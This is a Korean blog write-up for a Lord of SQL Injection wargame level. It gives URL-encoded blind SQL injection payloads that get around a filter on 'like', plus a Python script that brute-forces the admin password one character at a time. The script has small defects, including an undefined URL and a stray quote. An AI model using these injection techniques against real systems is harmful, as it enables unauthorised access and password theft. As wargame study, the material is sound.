이 문제는 like가 막혀있으므로 in을 이용하여 풀면 된다.
?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dlength(pw)%0din%0d(8)
?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dright(left(pw,1),1))%0din%0d(%22a%22)
import requests
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}
'''
?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dright(left(pw,1),1))%0din%0d(%22a%22)
'''
for i in range(8):
for c in range(33, 125):
rs = requests.get(url + "?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dright(left(pw," + str(i+1) + "),1)%0din%0d(%22" + chr(c) + "%22)", headers=headers, cookies=cookies)
text = rs.text
if("<h2>Hello admin</h2>" in text):
print(str(i+1) + " " +chr(c) + " find it”)
'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글
| [LOS1] assessin (0) | 2018.09.22 |
|---|---|
| [LOS1] giant (0) | 2018.09.22 |
| [LOS1] darkknight (0) | 2018.09.22 |
| [LOS1] golem (0) | 2018.09.22 |
| [LOS1] skelleton (0) | 2018.09.22 |